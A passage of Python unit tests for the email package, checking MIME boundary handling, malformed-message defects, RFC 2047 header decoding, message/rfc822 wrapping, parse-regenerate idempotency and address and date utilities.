msg = self._msgobj('msg_37.txt')
self.assertEqual(len(msg.get_payload()), 3)
def test_nested_inner_contains_outer_boundary(self):
eq = self.ndiffAssertEqual
# msg_38.txt has an inner part that contains outer boundaries. My
# interpretation of RFC 2046 (based on sections 5.1 and 5.1.2) say
# these are illegal and should be interpreted as unterminated inner
# parts.
msg = self._msgobj('msg_38.txt')
sfp = StringIO()
iterators._structure(msg, sfp)
eq(sfp.getvalue(), """\
multipart/mixed
multipart/mixed
multipart/alternative
text/plain
text/plain
text/plain
text/plain
""")
def test_nested_with_same_boundary(self):
eq = self.ndiffAssertEqual
        # msg_39.txt is similarly evil in that it's got inner parts that use
        # the same boundary as outer parts.  Again, I believe the way this is
        # parsed is closest to the spirit of RFC 2046.
msg = self._msgobj('msg_39.txt')
sfp = StringIO()
iterators._structure(msg, sfp)
eq(sfp.getvalue(), """\
multipart/mixed
multipart/mixed
multipart/alternative
application/octet-stream
application/octet-stream
text/plain
""")
def test_boundary_in_non_multipart(self):
msg = self._msgobj('msg_40.txt')
self.assertEqual(msg.as_string(), '''\
MIME-Version: 1.0
Content-Type: text/html; boundary="--961284236552522269"
----961284236552522269
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit
<html></html>
----961284236552522269--
''')
def test_boundary_with_leading_space(self):
eq = self.assertEqual
msg = email.message_from_string('''\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=" XXXX"
-- XXXX
Content-Type: text/plain
-- XXXX
Content-Type: text/plain
-- XXXX--
''')
self.failUnless(msg.is_multipart())
eq(msg.get_boundary(), ' XXXX')
eq(len(msg.get_payload()), 2)
def test_boundary_without_trailing_newline(self):
m = Parser().parsestr("""\
Content-Type: multipart/mixed; boundary="===============0012394164=="
MIME-Version: 1.0
--===============0012394164==
Content-Type: image/file1.jpg
MIME-Version: 1.0
Content-Transfer-Encoding: base64
YXNkZg==
--===============0012394164==--""")
self.assertEquals(m.get_payload(0).get_payload(), 'YXNkZg==')
# Test some badly formatted messages
class TestNonConformant(TestEmailBase):
def test_parse_missing_minor_type(self):
eq = self.assertEqual
msg = self._msgobj('msg_14.txt')
eq(msg.get_content_type(), 'text/plain')
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
def test_same_boundary_inner_outer(self):
unless = self.failUnless
msg = self._msgobj('msg_15.txt')
# XXX We can probably eventually do better
inner = msg.get_payload(0)
unless(hasattr(inner, 'defects'))
self.assertEqual(len(inner.defects), 1)
unless(isinstance(inner.defects[0],
errors.StartBoundaryNotFoundDefect))
def test_multipart_no_boundary(self):
unless = self.failUnless
msg = self._msgobj('msg_25.txt')
unless(isinstance(msg.get_payload(), str))
self.assertEqual(len(msg.defects), 2)
unless(isinstance(msg.defects[0], errors.NoBoundaryInMultipartDefect))
unless(isinstance(msg.defects[1],
errors.MultipartInvariantViolationDefect))
def test_invalid_content_type(self):
eq = self.assertEqual
neq = self.ndiffAssertEqual
msg = Message()
        # RFC 2045, section 5.2 says invalid yields text/plain
msg['Content-Type'] = 'text'
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
eq(msg.get_content_type(), 'text/plain')
# Clear the old value and try something /really/ invalid
del msg['content-type']
msg['Content-Type'] = 'foo'
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
eq(msg.get_content_type(), 'text/plain')
# Still, make sure that the message is idempotently generated
s = StringIO()
g = Generator(s)
g.flatten(msg)
neq(s.getvalue(), 'Content-Type: foo\n\n')
def test_no_start_boundary(self):
eq = self.ndiffAssertEqual
msg = self._msgobj('msg_31.txt')
eq(msg.get_payload(), """\
--BOUNDARY
Content-Type: text/plain
message 1
--BOUNDARY
Content-Type: text/plain
message 2
--BOUNDARY--
""")
def test_no_separating_blank_line(self):
eq = self.ndiffAssertEqual
msg = self._msgobj('msg_35.txt')
eq(msg.as_string(), """\
From: aperson@dom.ain
To: bperson@dom.ain
Subject: here's something interesting
counter to RFC 2822, there's no separating newline here
""")
def test_lying_multipart(self):
unless = self.failUnless
msg = self._msgobj('msg_41.txt')
unless(hasattr(msg, 'defects'))
self.assertEqual(len(msg.defects), 2)
unless(isinstance(msg.defects[0], errors.NoBoundaryInMultipartDefect))
unless(isinstance(msg.defects[1],
errors.MultipartInvariantViolationDefect))
def test_missing_start_boundary(self):
outer = self._msgobj('msg_42.txt')
# The message structure is:
#
# multipart/mixed
# text/plain
# message/rfc822
# multipart/mixed [*]
#
# [*] This message is missing its start boundary
bad = outer.get_payload(1).get_payload(0)
self.assertEqual(len(bad.defects), 1)
self.failUnless(isinstance(bad.defects[0],
errors.StartBoundaryNotFoundDefect))
def test_first_line_is_continuation_header(self):
eq = self.assertEqual
m = ' Line 1\nLine 2\nLine 3'
msg = email.message_from_string(m)
eq(msg.keys(), [])
eq(msg.get_payload(), 'Line 2\nLine 3')
eq(len(msg.defects), 1)
self.failUnless(isinstance(msg.defects[0],
errors.FirstHeaderLineIsContinuationDefect))
eq(msg.defects[0].line, ' Line 1\n')
# Test RFC 2047 header encoding and decoding
class TestRFC2047(unittest.TestCase):
def test_rfc2047_multiline(self):
eq = self.assertEqual
s = """Re: =?mac-iceland?q?r=8Aksm=9Arg=8Cs?= baz
foo bar =?mac-iceland?q?r=8Aksm=9Arg=8Cs?="""
dh = decode_header(s)
eq(dh, [
('Re:', None),
('r\x8aksm\x9arg\x8cs', 'mac-iceland'),
('baz foo bar', None),
('r\x8aksm\x9arg\x8cs', 'mac-iceland')])
eq(str(make_header(dh)),
"""Re: =?mac-iceland?q?r=8Aksm=9Arg=8Cs?= baz foo bar
=?mac-iceland?q?r=8Aksm=9Arg=8Cs?=""")
def test_whitespace_eater_unicode(self):
eq = self.assertEqual
s = '=?ISO-8859-1?Q?Andr=E9?= Pirard <pirard@dom.ain>'
dh = decode_header(s)
eq(dh, [('Andr\xe9', 'iso-8859-1'), ('Pirard <pirard@dom.ain>', None)])
hu = unicode(make_header(dh)).encode('latin-1')
eq(hu, 'Andr\xe9 Pirard <pirard@dom.ain>')
def test_whitespace_eater_unicode_2(self):
eq = self.assertEqual
s = 'The =?iso-8859-1?b?cXVpY2sgYnJvd24gZm94?= jumped over the =?iso-8859-1?b?bGF6eSBkb2c=?='
dh = decode_header(s)
eq(dh, [('The', None), ('quick brown fox', 'iso-8859-1'),
('jumped over the', None), ('lazy dog', 'iso-8859-1')])
hu = make_header(dh).__unicode__()
eq(hu, u'The quick brown fox jumped over the lazy dog')
def test_rfc2047_missing_whitespace(self):
s = 'Sm=?ISO-8859-1?B?9g==?=rg=?ISO-8859-1?B?5Q==?=sbord'
dh = decode_header(s)
self.assertEqual(dh, [(s, None)])
def test_rfc2047_with_whitespace(self):
s = 'Sm =?ISO-8859-1?B?9g==?= rg =?ISO-8859-1?B?5Q==?= sbord'
dh = decode_header(s)
self.assertEqual(dh, [('Sm', None), ('\xf6', 'iso-8859-1'),
('rg', None), ('\xe5', 'iso-8859-1'),
('sbord', None)])
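# Illustrative sketch (added; not in the original file): decode_header()
# splits an RFC 2047 header into (chunk, charset) pairs and make_header()
# reassembles them, which is the round trip the tests above depend on.
def _rfc2047_demo():
    s = '=?iso-8859-1?q?hello?= world'
    parts = decode_header(s)        # [('hello', 'iso-8859-1'), ('world', None)]
    return str(make_header(parts))  # encodes back to an equivalent header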
# Test the MIMEMessage class
class TestMIMEMessage(TestEmailBase):
def setUp(self):
fp = openfile('msg_11.txt')
try:
self._text = fp.read()
finally:
fp.close()
def test_type_error(self):
self.assertRaises(TypeError, MIMEMessage, 'a plain string')
def test_valid_argument(self):
eq = self.assertEqual
unless = self.failUnless
subject = 'A sub-message'
m = Message()
m['Subject'] = subject
r = MIMEMessage(m)
eq(r.get_content_type(), 'message/rfc822')
payload = r.get_payload()
unless(isinstance(payload, list))
eq(len(payload), 1)
subpart = payload[0]
unless(subpart is m)
eq(subpart['subject'], subject)
def test_bad_multipart(self):
eq = self.assertEqual
msg1 = Message()
msg1['Subject'] = 'subpart 1'
msg2 = Message()
msg2['Subject'] = 'subpart 2'
r = MIMEMessage(msg1)
self.assertRaises(errors.MultipartConversionError, r.attach, msg2)
def test_generate(self):
# First craft the message to be encapsulated
m = Message()
m['Subject'] = 'An enclosed message'
m.set_payload('Here is the body of the message.\n')
r = MIMEMessage(m)
r['Subject'] = 'The enclosing message'
s = StringIO()
g = Generator(s)
g.flatten(r)
self.assertEqual(s.getvalue(), """\
Content-Type: message/rfc822
MIME-Version: 1.0
Subject: The enclosing message
Subject: An enclosed message
Here is the body of the message.
""")
def test_parse_message_rfc822(self):
eq = self.assertEqual
unless = self.failUnless
msg = self._msgobj('msg_11.txt')
eq(msg.get_content_type(), 'message/rfc822')
payload = msg.get_payload()
unless(isinstance(payload, list))
eq(len(payload), 1)
submsg = payload[0]
self.failUnless(isinstance(submsg, Message))
eq(submsg['subject'], 'An enclosed message')
eq(submsg.get_payload(), 'Here is the body of the message.\n')
def test_dsn(self):
eq = self.assertEqual
unless = self.failUnless
# msg 16 is a Delivery Status Notification, see RFC 1894
msg = self._msgobj('msg_16.txt')
eq(msg.get_content_type(), 'multipart/report')
unless(msg.is_multipart())
eq(len(msg.get_payload()), 3)
# Subpart 1 is a text/plain, human readable section
subpart = msg.get_payload(0)
eq(subpart.get_content_type(), 'text/plain')
eq(subpart.get_payload(), """\
This report relates to a message you sent with the following header fields:
Message-id: <002001c144a6$8752e060$56104586@oxy.edu>
Date: Sun, 23 Sep 2001 20:10:55 -0700
From: "Ian T. Henry" <henryi@oxy.edu>
To: SoCal Raves <scr@socal-raves.org>
Subject: [scr] yeah for Ians!!
Your message cannot be delivered to the following recipients:
Recipient address: jangel1@cougar.noc.ucla.edu
Reason: recipient reached disk quota
""")
# Subpart 2 contains the machine parsable DSN information. It
# consists of two blocks of headers, represented by two nested Message
# objects.
subpart = msg.get_payload(1)
eq(subpart.get_content_type(), 'message/delivery-status')
eq(len(subpart.get_payload()), 2)
# message/delivery-status should treat each block as a bunch of
# headers, i.e. a bunch of Message objects.
dsn1 = subpart.get_payload(0)
unless(isinstance(dsn1, Message))
eq(dsn1['original-envelope-id'], '0GK500B4HD0888@cougar.noc.ucla.edu')
eq(dsn1.get_param('dns', header='reporting-mta'), '')
# Try a missing one <wink>
eq(dsn1.get_param('nsd', header='reporting-mta'), None)
dsn2 = subpart.get_payload(1)
unless(isinstance(dsn2, Message))
eq(dsn2['action'], 'failed')
eq(dsn2.get_params(header='original-recipient'),
[('rfc822', ''), ('jangel1@cougar.noc.ucla.edu', '')])
eq(dsn2.get_param('rfc822', header='final-recipient'), '')
# Subpart 3 is the original message
subpart = msg.get_payload(2)
eq(subpart.get_content_type(), 'message/rfc822')
payload = subpart.get_payload()
unless(isinstance(payload, list))
eq(len(payload), 1)
subsubpart = payload[0]
unless(isinstance(subsubpart, Message))
eq(subsubpart.get_content_type(), 'text/plain')
eq(subsubpart['message-id'],
'<002001c144a6$8752e060$56104586@oxy.edu>')
def test_epilogue(self):
eq = self.ndiffAssertEqual
fp = openfile('msg_21.txt')
try:
text = fp.read()
finally:
fp.close()
msg = Message()
msg['From'] = 'aperson@dom.ain'
msg['To'] = 'bperson@dom.ain'
msg['Subject'] = 'Test'
msg.preamble = 'MIME message'
msg.epilogue = 'End of MIME message\n'
msg1 = MIMEText('One')
msg2 = MIMEText('Two')
msg.add_header('Content-Type', 'multipart/mixed', boundary='BOUNDARY')
msg.attach(msg1)
msg.attach(msg2)
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), text)
def test_no_nl_preamble(self):
eq = self.ndiffAssertEqual
msg = Message()
msg['From'] = 'aperson@dom.ain'
msg['To'] = 'bperson@dom.ain'
msg['Subject'] = 'Test'
msg.preamble = 'MIME message'
msg.epilogue = ''
msg1 = MIMEText('One')
msg2 = MIMEText('Two')
msg.add_header('Content-Type', 'multipart/mixed', boundary='BOUNDARY')
msg.attach(msg1)
msg.attach(msg2)
eq(msg.as_string(), """\
From: aperson@dom.ain
To: bperson@dom.ain
Subject: Test
Content-Type: multipart/mixed; boundary="BOUNDARY"
MIME message
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
One
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Two
--BOUNDARY--
""")
def test_default_type(self):
eq = self.assertEqual
fp = openfile('msg_30.txt')
try:
msg = email.message_from_file(fp)
finally:
fp.close()
container1 = msg.get_payload(0)
eq(container1.get_default_type(), 'message/rfc822')
eq(container1.get_content_type(), 'message/rfc822')
container2 = msg.get_payload(1)
eq(container2.get_default_type(), 'message/rfc822')
eq(container2.get_content_type(), 'message/rfc822')
container1a = container1.get_payload(0)
eq(container1a.get_default_type(), 'text/plain')
eq(container1a.get_content_type(), 'text/plain')
container2a = container2.get_payload(0)
eq(container2a.get_default_type(), 'text/plain')
eq(container2a.get_content_type(), 'text/plain')
def test_default_type_with_explicit_container_type(self):
eq = self.assertEqual
fp = openfile('msg_28.txt')
try:
msg = email.message_from_file(fp)
finally:
fp.close()
container1 = msg.get_payload(0)
eq(container1.get_default_type(), 'message/rfc822')
eq(container1.get_content_type(), 'message/rfc822')
container2 = msg.get_payload(1)
eq(container2.get_default_type(), 'message/rfc822')
eq(container2.get_content_type(), 'message/rfc822')
container1a = container1.get_payload(0)
eq(container1a.get_default_type(), 'text/plain')
eq(container1a.get_content_type(), 'text/plain')
container2a = container2.get_payload(0)
eq(container2a.get_default_type(), 'text/plain')
eq(container2a.get_content_type(), 'text/plain')
def test_default_type_non_parsed(self):
eq = self.assertEqual
neq = self.ndiffAssertEqual
# Set up container
container = MIMEMultipart('digest', 'BOUNDARY')
container.epilogue = ''
# Set up subparts
subpart1a = MIMEText('message 1\n')
subpart2a = MIMEText('message 2\n')
subpart1 = MIMEMessage(subpart1a)
subpart2 = MIMEMessage(subpart2a)
container.attach(subpart1)
container.attach(subpart2)
eq(subpart1.get_content_type(), 'message/rfc822')
eq(subpart1.get_default_type(), 'message/rfc822')
eq(subpart2.get_content_type(), 'message/rfc822')
eq(subpart2.get_default_type(), 'message/rfc822')
neq(container.as_string(0), '''\
Content-Type: multipart/digest; boundary="BOUNDARY"
MIME-Version: 1.0
--BOUNDARY
Content-Type: message/rfc822
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 1
--BOUNDARY
Content-Type: message/rfc822
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 2
--BOUNDARY--
''')
del subpart1['content-type']
del subpart1['mime-version']
del subpart2['content-type']
del subpart2['mime-version']
eq(subpart1.get_content_type(), 'message/rfc822')
eq(subpart1.get_default_type(), 'message/rfc822')
eq(subpart2.get_content_type(), 'message/rfc822')
eq(subpart2.get_default_type(), 'message/rfc822')
neq(container.as_string(0), '''\
Content-Type: multipart/digest; boundary="BOUNDARY"
MIME-Version: 1.0
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 1
--BOUNDARY
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
message 2
--BOUNDARY--
''')
def test_mime_attachments_in_constructor(self):
eq = self.assertEqual
text1 = MIMEText('')
text2 = MIMEText('')
msg = MIMEMultipart(_subparts=(text1, text2))
eq(len(msg.get_payload()), 2)
eq(msg.get_payload(0), text1)
eq(msg.get_payload(1), text2)
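# Illustrative sketch (added; helper name is ours): wrapping a Message in
# MIMEMessage yields a message/rfc822 container whose payload is a
# one-element list holding the original object, as test_valid_argument shows.
def _mimemessage_demo():
    inner = Message()
    inner['Subject'] = 'wrapped'
    outer = MIMEMessage(inner)
    return (outer.get_content_type() == 'message/rfc822' and
            outer.get_payload(0) is inner)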
# A general test of parser->model->generator idempotency. IOW, read a message
# in, parse it into a message object tree, then without touching the tree,
# regenerate the plain text. The original text and the transformed text
# should be identical. Note that we ignore the Unix-From since that may
# contain a changed date.
class TestIdempotent(TestEmailBase):
def _msgobj(self, filename):
fp = openfile(filename)
try:
data = fp.read()
finally:
fp.close()
msg = email.message_from_string(data)
return msg, data
def _idempotent(self, msg, text):
eq = self.ndiffAssertEqual
s = StringIO()
g = Generator(s, maxheaderlen=0)
g.flatten(msg)
eq(text, s.getvalue())
def test_parse_text_message(self):
eq = self.assertEquals
msg, text = self._msgobj('msg_01.txt')
eq(msg.get_content_type(), 'text/plain')
eq(msg.get_content_maintype(), 'text')
eq(msg.get_content_subtype(), 'plain')
eq(msg.get_params()[1], ('charset', 'us-ascii'))
eq(msg.get_param('charset'), 'us-ascii')
eq(msg.preamble, None)
eq(msg.epilogue, None)
self._idempotent(msg, text)
def test_parse_untyped_message(self):
eq = self.assertEquals
msg, text = self._msgobj('msg_03.txt')
eq(msg.get_content_type(), 'text/plain')
eq(msg.get_params(), None)
eq(msg.get_param('charset'), None)
self._idempotent(msg, text)
def test_simple_multipart(self):
msg, text = self._msgobj('msg_04.txt')
self._idempotent(msg, text)
def test_MIME_digest(self):
msg, text = self._msgobj('msg_02.txt')
self._idempotent(msg, text)
def test_long_header(self):
msg, text = self._msgobj('msg_27.txt')
self._idempotent(msg, text)
def test_MIME_digest_with_part_headers(self):
msg, text = self._msgobj('msg_28.txt')
self._idempotent(msg, text)
def test_mixed_with_image(self):
msg, text = self._msgobj('msg_06.txt')
self._idempotent(msg, text)
def test_multipart_report(self):
msg, text = self._msgobj('msg_05.txt')
self._idempotent(msg, text)
def test_dsn(self):
msg, text = self._msgobj('msg_16.txt')
self._idempotent(msg, text)
def test_preamble_epilogue(self):
msg, text = self._msgobj('msg_21.txt')
self._idempotent(msg, text)
def test_multipart_one_part(self):
msg, text = self._msgobj('msg_23.txt')
self._idempotent(msg, text)
def test_multipart_no_parts(self):
msg, text = self._msgobj('msg_24.txt')
self._idempotent(msg, text)
def test_no_start_boundary(self):
msg, text = self._msgobj('msg_31.txt')
self._idempotent(msg, text)
def test_rfc2231_charset(self):
msg, text = self._msgobj('msg_32.txt')
self._idempotent(msg, text)
def test_more_rfc2231_parameters(self):
msg, text = self._msgobj('msg_33.txt')
self._idempotent(msg, text)
def test_text_plain_in_a_multipart_digest(self):
msg, text = self._msgobj('msg_34.txt')
self._idempotent(msg, text)
def test_nested_multipart_mixeds(self):
msg, text = self._msgobj('msg_12a.txt')
self._idempotent(msg, text)
def test_message_external_body_idempotent(self):
msg, text = self._msgobj('msg_36.txt')
self._idempotent(msg, text)
def test_content_type(self):
eq = self.assertEquals
unless = self.failUnless
# Get a message object and reset the seek pointer for other tests
msg, text = self._msgobj('msg_05.txt')
eq(msg.get_content_type(), 'multipart/report')
# Test the Content-Type: parameters
params = {}
for pk, pv in msg.get_params():
params[pk] = pv
eq(params['report-type'], 'delivery-status')
eq(params['boundary'], 'D1690A7AC1.996856090/mail.example.com')
eq(msg.preamble, 'This is a MIME-encapsulated message.\n')
eq(msg.epilogue, '\n')
eq(len(msg.get_payload()), 3)
# Make sure the subparts are what we expect
msg1 = msg.get_payload(0)
eq(msg1.get_content_type(), 'text/plain')
eq(msg1.get_payload(), 'Yadda yadda yadda\n')
msg2 = msg.get_payload(1)
eq(msg2.get_content_type(), 'text/plain')
eq(msg2.get_payload(), 'Yadda yadda yadda\n')
msg3 = msg.get_payload(2)
eq(msg3.get_content_type(), 'message/rfc822')
self.failUnless(isinstance(msg3, Message))
payload = msg3.get_payload()
unless(isinstance(payload, list))
eq(len(payload), 1)
msg4 = payload[0]
unless(isinstance(msg4, Message))
eq(msg4.get_payload(), 'Yadda yadda yadda\n')
def test_parser(self):
eq = self.assertEquals
unless = self.failUnless
msg, text = self._msgobj('msg_06.txt')
# Check some of the outer headers
eq(msg.get_content_type(), 'message/rfc822')
# Make sure the payload is a list of exactly one sub-Message, and that
# that submessage has a type of text/plain
payload = msg.get_payload()
unless(isinstance(payload, list))
eq(len(payload), 1)
msg1 = payload[0]
self.failUnless(isinstance(msg1, Message))
eq(msg1.get_content_type(), 'text/plain')
self.failUnless(isinstance(msg1.get_payload(), str))
eq(msg1.get_payload(), '\n')
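# Minimal standalone restatement of the idempotency check above (added for
# illustration only): parse, regenerate without header wrapping, compare.
def _idempotency_demo(text='Subject: hi\n\nbody\n'):
    msg = email.message_from_string(text)
    s = StringIO()
    Generator(s, maxheaderlen=0).flatten(msg)
    return s.getvalue() == text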
# Test various other bits of the package's functionality
class TestMiscellaneous(TestEmailBase):
def test_message_from_string(self):
fp = openfile('msg_01.txt')
try:
text = fp.read()
finally:
fp.close()
msg = email.message_from_string(text)
s = StringIO()
# Don't wrap/continue long headers since we're trying to test
# idempotency.
g = Generator(s, maxheaderlen=0)
g.flatten(msg)
self.assertEqual(text, s.getvalue())
def test_message_from_file(self):
fp = openfile('msg_01.txt')
try:
text = fp.read()
fp.seek(0)
msg = email.message_from_file(fp)
s = StringIO()
# Don't wrap/continue long headers since we're trying to test
# idempotency.
g = Generator(s, maxheaderlen=0)
g.flatten(msg)
self.assertEqual(text, s.getvalue())
finally:
fp.close()
def test_message_from_string_with_class(self):
unless = self.failUnless
fp = openfile('msg_01.txt')
try:
text = fp.read()
finally:
fp.close()
# Create a subclass
class MyMessage(Message):
pass
msg = email.message_from_string(text, MyMessage)
unless(isinstance(msg, MyMessage))
# Try something more complicated
fp = openfile('msg_02.txt')
try:
text = fp.read()
finally:
fp.close()
msg = email.message_from_string(text, MyMessage)
for subpart in msg.walk():
unless(isinstance(subpart, MyMessage))
def test_message_from_file_with_class(self):
unless = self.failUnless
# Create a subclass
class MyMessage(Message):
pass
fp = openfile('msg_01.txt')
try:
msg = email.message_from_file(fp, MyMessage)
finally:
fp.close()
unless(isinstance(msg, MyMessage))
# Try something more complicated
fp = openfile('msg_02.txt')
try:
msg = email.message_from_file(fp, MyMessage)
finally:
fp.close()
for subpart in msg.walk():
unless(isinstance(subpart, MyMessage))
def test__all__(self):
module = __import__('email')
# Can't use sorted() here due to Python 2.3 compatibility
all = module.__all__[:]
all.sort()
self.assertEqual(all, [
# Old names
'Charset', 'Encoders', 'Errors', 'Generator',
'Header', 'Iterators', 'MIMEAudio', 'MIMEBase',
'MIMEImage', 'MIMEMessage', 'MIMEMultipart',
'MIMENonMultipart', 'MIMEText', 'Message',
'Parser', 'Utils', 'base64MIME',
# new names
'base64mime', 'charset', 'encoders', 'errors', 'generator',
'header', 'iterators', 'message', 'message_from_file',
'message_from_string', 'mime', 'parser',
'quopriMIME', 'quoprimime', 'utils',
])
def test_formatdate(self):
now = time.time()
self.assertEqual(utils.parsedate(utils.formatdate(now))[:6],
time.gmtime(now)[:6])
def test_formatdate_localtime(self):
now = time.time()
self.assertEqual(
utils.parsedate(utils.formatdate(now, localtime=True))[:6],
time.localtime(now)[:6])
def test_formatdate_usegmt(self):
now = time.time()
self.assertEqual(
utils.formatdate(now, localtime=False),
time.strftime('%a, %d %b %Y %H:%M:%S -0000', time.gmtime(now)))
self.assertEqual(
utils.formatdate(now, localtime=False, usegmt=True),
time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime(now)))
def test_parsedate_none(self):
self.assertEqual(utils.parsedate(''), None)
def test_parsedate_compact(self):
# The FWS (folding whitespace) after the comma is optional
self.assertEqual(utils.parsedate('Wed,3 Apr 2002 14:58:26 +0800'),
utils.parsedate('Wed, 3 Apr 2002 14:58:26 +0800'))
def test_parsedate_no_dayofweek(self):
eq = self.assertEqual
eq(utils.parsedate_tz('25 Feb 2003 13:47:26 -0800'),
(2003, 2, 25, 13, 47, 26, 0, 1, -1, -28800))
def test_parsedate_compact_no_dayofweek(self):
eq = self.assertEqual
eq(utils.parsedate_tz('5 Feb 2003 13:47:26 -0800'),
(2003, 2, 5, 13, 47, 26, 0, 1, -1, -28800))
def test_parsedate_acceptable_to_time_functions(self):
eq = self.assertEqual
timetup = utils.parsedate('5 Feb 2003 13:47:26 -0800')
t = int(time.mktime(timetup))
eq(time.localtime(t)[:6], timetup[:6])
eq(int(time.strftime('%Y', timetup)), 2003)
timetup = utils.parsedate_tz('5 Feb 2003 13:47:26 -0800')
t = int(time.mktime(timetup[:9]))
eq(time.localtime(t)[:6], timetup[:6])
eq(int(time.strftime('%Y', timetup[:9])), 2003)
def test_parseaddr_empty(self):
self.assertEqual(utils.parseaddr('<>'), ('', ''))
self.assertEqual(utils.formataddr(utils.parseaddr('<>')), '')
def test_noquote_dump(self):
self.assertEqual(
utils.formataddr(('A Silly Person', 'person@dom.ain')),
'A Silly Person <person@dom.ain>')
def test_escape_dump(self):
self.assertEqual(
utils.formataddr(('A (Very) Silly Person', 'person@dom.ain')),
r'"A \(Very\) Silly Person" <person@dom.ain>')
a = r'A \(Special\) Person'
b = 'person@dom.ain'
self.assertEqual(utils.parseaddr(utils.formataddr((a, b))), (a, b))
def test_escape_backslashes(self):
self.assertEqual(
utils.formataddr(('Arthur \Backslash\ Foobar', 'person@dom.ain')),
r'"Arthur \\Backslash\\ Foobar" <person@dom.ain>')
a = r'Arthur \Backslash\ Foobar'
b = 'person@dom.ain'
self.assertEqual(utils.parseaddr(utils.formataddr((a, b))), (a, b))
def test_name_with_dot(self):
x = 'John X. Doe <jxd@example.com>'
y = '"John X. Doe" <jxd@example.com>'
a, b = ('John X. Doe', 'jxd@example.com')
self.assertEqual(utils.parseaddr(x), (a, b))
self.assertEqual(utils.parseaddr(y), (a, b))
# formataddr() quotes the name if there's a dot in it
self.assertEqual(utils.formataddr((a, b)), y)
def test_multiline_from_comment(self):
x = """\
Foo
\tBar <foo@example.com>"""
self.assertEqual(utils.parseaddr(x), ('Foo Bar', 'foo@example.com'))
def test_quote_dump(self):
self.assertEqual(
utils.formataddr(('A Silly; Person', 'person@dom.ain')),
r'"A Silly; Person" <person@dom.ain>')
def test_fix_eols(self):
eq = self.assertEqual
eq(utils.fix_eols('hello'), 'hello')
eq(utils.fix_eols('hello\n'), 'hello\r\n')
eq(utils.fix_eols('hello\r'), 'hello\r\n')
eq(utils.fix_eols('hello\r\n'), 'hello\r\n')
eq(utils.fix_eols('hello\n\r'), 'hello\r\n\r\n')
def test_charset_richcomparisons(self):
eq = self.assertEqual
ne = self.failIfEqual
cset1 = Charset()
cset2 = Charset()
eq(cset1, 'us-ascii')
eq(cset1, 'US-ASCII')
eq(cset1, 'Us-AsCiI')
eq('us-ascii', cset1)
eq('US-ASCII', cset1)
eq('Us-AsCiI', cset1)
ne(cset1, 'usascii')
ne(cset1, 'USASCII')
ne(cset1, 'UsAsCiI')
ne('usascii', cset1)
ne('USASCII', cset1)
ne('UsAsCiI', cset1)
eq(cset1, cset2)
eq(cset2, cset1)
def test_getaddresses(self):
eq = self.assertEqual
eq(utils.getaddresses(['aperson@dom.ain (Al Person)',
'Bud Person <bperson@dom.ain>']),
[('Al Person', 'aperson@dom.ain'),
('Bud Person', 'bperson@dom.ain')])
def test_getaddresses_nasty(self):
eq = self.assertEqual
eq(utils.getaddresses(['foo: ;']), [('', '')])
eq(utils.getaddresses(
['[]*-- =~$']),
[('', ''), ('', ''), ('', '*--')])
eq(utils.getaddresses(
['foo: ;', '"Jason R. Mastaler" <jason@dom.ain>']),
[('', ''), ('Jason R. Mastaler', 'jason@dom.ain')])
def test_getaddresses_embedded_comment(self):
"""Test proper handling of a nested comment"""
eq = self.assertEqual
addrs = utils.getaddresses(['User ((nested comment)) <foo@bar.com>'])
eq(addrs[0][1], 'foo@bar.com')
def test_utils_quote_unquote(self):
eq = self.assertEqual
msg = Message()
msg.add_header('content-disposition', 'attachment',
filename='foo\\wacky"name')
eq(msg.get_filename(), 'foo\\wacky"name')
def test_get_body_encoding_with_bogus_charset(self):
charset = Charset('not a charset')
self.assertEqual(charset.get_body_encoding(), 'base64')
def test_get_body_encoding_with_uppercase_charset(self):
eq = self.assertEqual
msg = Message()
msg['Content-Type'] = 'text/plain; charset=UTF-8'
eq(msg['content-type'], 'text/plain; charset=UTF-8')
charsets = msg.get_charsets()
eq(len(charsets), 1)
eq(charsets[0], 'utf-8')
charset = Charset(charsets[0])
eq(charset.get_body_encoding(), 'base64')
msg.set_payload('hello world', charset=charset)
eq(msg.get_payload(), 'aGVsbG8gd29ybGQ=\n')
eq(msg.get_payload(decode=True), 'hello world')
eq(msg['content-transfer-encoding'], 'base64')
# Try another one
msg = Message()
msg['Content-Type'] = 'text/plain; charset="US-ASCII"'
charsets = msg.get_charsets()
eq(len(charsets), 1)
eq(charsets[0], 'us-ascii')
charset = Charset(charsets[0])
eq(charset.get_body_encoding(), encoders.encode_7or8bit)
msg.set_payload('hello world', charset=charset)
eq(msg.get_payload(), 'hello world')
eq(msg['content-transfer-encoding'], '7bit')
def test_charsets_case_insensitive(self):
lc = Charset('us-ascii')
uc = Charset('US-ASCII')
self.assertEqual(lc.get_body_encoding(), uc.get_body_encoding())
def test_partial_falls_inside_message_delivery_status(self):
eq = self.ndiffAssertEqual
# The Parser interface provides chunks of data to FeedParser in 8192
# byte gulps. SF bug #1076485 found one of those chunks inside
# message/delivery-status header block, which triggered an
# unreadline() of NeedMoreData.
msg = self._msgobj('msg_43.txt')
sfp = StringIO()
iterators._structure(msg, sfp)
eq(sfp.getvalue(), """\
multipart/report
text/plain
message/delivery-status
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/plain
text/rfc822-headers
""")
# Test the iterator/generators
class TestIterators(TestEmailBase):
def test_body_line_iterator(self):
eq = self.assertEqual
